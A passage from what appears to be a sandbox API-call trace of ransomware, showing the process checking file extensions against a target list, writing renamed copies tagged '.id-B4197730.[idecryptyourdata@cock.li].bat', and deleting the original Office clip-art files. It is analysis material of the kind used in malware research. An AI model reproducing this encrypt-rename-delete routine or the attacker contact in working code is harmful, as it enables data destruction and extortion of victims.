68 [0067.070] lstrlenW (lpString=".jpg") returned 4 [0067.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.070] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.070] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.071] GetLastError () returned 0x0 [0067.071] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xe86, lpOverlapped=0x0) returned 1 [0067.077] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe90, lpOverlapped=0x0) returned 1 [0067.078] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.078] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.078] SetEndOfFile (hFile=0x2c0) returned 1 [0067.078] CloseHandle (hObject=0x2c0) returned 1 [0067.078] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.078] SetEndOfFile (hFile=0x340) returned 1 [0067.079] CloseHandle (hObject=0x340) returned 1 [0067.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf")) returned 1 [0067.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 68 [0067.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 68 [0067.080] lstrlenW (lpString=".doc") returned 4 [0067.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.080] lstrlenW (lpString=".docx") returned 5 [0067.080] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.080] lstrlenW (lpString=".pdf") returned 4 [0067.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.080] lstrlenW (lpString=".xls") returned 4 [0067.080] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.080] lstrlenW (lpString=".xlsx") returned 5 [0067.080] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.080] lstrlenW (lpString=".ppt") returned 4 [0067.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 68 [0067.080] lstrlenW (lpString=".zip") returned 4 [0067.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.080] lstrlenW (lpString=".rar") returned 4 [0067.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.080] lstrlenW (lpString=".bz2") returned 4 [0067.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.080] lstrlenW (lpString=".7z") returned 3 [0067.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 68 [0067.080] lstrlenW (lpString=".dbf") returned 4 [0067.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 68 [0067.080] lstrlenW (lpString=".1cd") returned 4 [0067.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 68 [0067.081] lstrlenW (lpString=".jpg") returned 4 [0067.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.081] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.081] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.081] GetLastError () returned 0x0 [0067.081] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x578, lpOverlapped=0x0) returned 1 [0067.086] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x580, lpOverlapped=0x0) returned 1 [0067.087] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.087] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.087] SetEndOfFile (hFile=0x2c0) returned 1 [0067.088] CloseHandle (hObject=0x2c0) returned 1 [0067.088] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.088] SetEndOfFile (hFile=0x340) returned 1 [0067.088] CloseHandle (hObject=0x340) returned 1 [0067.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf")) returned 1 [0067.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 68 [0067.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 68 [0067.089] lstrlenW (lpString=".doc") returned 4 [0067.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.089] lstrlenW (lpString=".docx") returned 5 [0067.089] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.089] lstrlenW (lpString=".pdf") returned 4 [0067.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.089] lstrlenW (lpString=".xls") returned 4 [0067.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.089] lstrlenW (lpString=".xlsx") returned 5 [0067.090] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.090] lstrlenW (lpString=".ppt") returned 4 [0067.090] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 68 [0067.090] lstrlenW (lpString=".zip") returned 4 [0067.090] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.090] lstrlenW (lpString=".rar") returned 4 [0067.090] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.090] lstrlenW (lpString=".bz2") returned 4 [0067.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.090] lstrlenW (lpString=".7z") returned 3 [0067.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 68 [0067.090] lstrlenW (lpString=".dbf") returned 4 [0067.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 68 [0067.090] lstrlenW (lpString=".1cd") returned 4 [0067.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 68 [0067.090] lstrlenW (lpString=".jpg") returned 4 [0067.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.092] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.092] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0067.093] GetLastError () returned 0x0 [0067.093] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2994, lpOverlapped=0x0) returned 1 [0067.100] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x29a0, lpOverlapped=0x0) returned 1 [0067.101] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.101] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.101] SetEndOfFile (hFile=0x354) returned 1 [0067.101] CloseHandle (hObject=0x354) returned 1 [0067.101] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.101] SetEndOfFile (hFile=0x2c8) returned 1 [0067.102] CloseHandle (hObject=0x2c8) returned 1 [0067.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf")) returned 1 [0067.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 68 [0067.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 68 [0067.103] lstrlenW (lpString=".doc") returned 4 [0067.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.103] lstrlenW (lpString=".docx") returned 5 [0067.103] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.103] lstrlenW (lpString=".pdf") returned 4 [0067.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.103] lstrlenW (lpString=".xls") returned 4 [0067.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.103] lstrlenW (lpString=".xlsx") returned 5 [0067.103] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.103] lstrlenW (lpString=".ppt") returned 4 [0067.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 68 [0067.103] lstrlenW (lpString=".zip") returned 4 [0067.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.103] lstrlenW (lpString=".rar") returned 4 [0067.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.103] lstrlenW (lpString=".bz2") returned 4 [0067.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.103] lstrlenW (lpString=".7z") returned 3 [0067.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 68 [0067.103] lstrlenW (lpString=".dbf") returned 4 [0067.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 68 [0067.104] lstrlenW (lpString=".1cd") returned 4 [0067.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 68 [0067.104] lstrlenW (lpString=".jpg") returned 4 [0067.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.104] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.104] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0067.104] GetLastError () returned 0x0 [0067.104] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x620, lpOverlapped=0x0) returned 1 [0067.112] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x630, lpOverlapped=0x0) returned 1 [0067.112] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.112] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.112] SetEndOfFile (hFile=0x354) returned 1 [0067.113] CloseHandle (hObject=0x354) returned 1 [0067.113] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.113] SetEndOfFile (hFile=0x2c8) returned 1 [0067.113] CloseHandle (hObject=0x2c8) returned 1 [0067.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf")) returned 1 [0067.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 68 [0067.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 68 [0067.114] lstrlenW (lpString=".doc") returned 4 [0067.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.114] lstrlenW (lpString=".docx") returned 5 [0067.114] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.114] lstrlenW (lpString=".pdf") returned 4 [0067.114] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.114] lstrlenW (lpString=".xls") returned 4 [0067.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.114] lstrlenW (lpString=".xlsx") returned 5 [0067.114] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.114] lstrlenW (lpString=".ppt") returned 4 [0067.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 68 [0067.114] lstrlenW (lpString=".zip") returned 4 [0067.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.114] lstrlenW (lpString=".rar") returned 4 [0067.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.114] lstrlenW (lpString=".bz2") returned 4 [0067.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.115] lstrlenW (lpString=".7z") returned 3 [0067.115] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 68 [0067.115] lstrlenW (lpString=".dbf") returned 4 [0067.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 68 [0067.115] lstrlenW (lpString=".1cd") returned 4 [0067.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 68 [0067.115] lstrlenW (lpString=".jpg") returned 4 [0067.115] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.115] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.115] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0067.115] GetLastError () returned 0x0 [0067.115] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2454, lpOverlapped=0x0) returned 1 [0067.117] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2460, lpOverlapped=0x0) returned 1 [0067.118] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.118] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.118] SetEndOfFile (hFile=0x354) returned 1 [0067.118] CloseHandle (hObject=0x354) returned 1 [0067.118] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.118] SetEndOfFile (hFile=0x2c8) returned 1 [0067.119] CloseHandle (hObject=0x2c8) returned 1 [0067.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf")) returned 1 [0067.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 68 [0067.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 68 [0067.119] lstrlenW (lpString=".doc") returned 4 [0067.119] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.119] lstrlenW (lpString=".docx") returned 5 [0067.119] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.119] lstrlenW (lpString=".pdf") returned 4 [0067.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.120] lstrlenW (lpString=".xls") returned 4 [0067.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.120] lstrlenW (lpString=".xlsx") returned 5 [0067.120] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.120] lstrlenW (lpString=".ppt") returned 4 [0067.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 68 [0067.120] lstrlenW (lpString=".zip") returned 4 [0067.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.120] lstrlenW (lpString=".rar") returned 4 [0067.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.120] lstrlenW (lpString=".bz2") returned 4 [0067.120] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.120] lstrlenW (lpString=".7z") returned 3 [0067.120] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 68 [0067.120] lstrlenW (lpString=".dbf") returned 4 [0067.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 68 [0067.120] lstrlenW (lpString=".1cd") returned 4 [0067.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 68 [0067.120] lstrlenW (lpString=".jpg") returned 4 [0067.120] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.120] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.120] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0067.121] GetLastError () returned 0x0 [0067.121] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xfc0, lpOverlapped=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xfd0, lpOverlapped=0x0) returned 1 [0068.229] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.229] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.229] SetEndOfFile (hFile=0x354) returned 1 [0068.230] CloseHandle (hObject=0x354) returned 1 [0068.230] SetFilePointerEx (in: 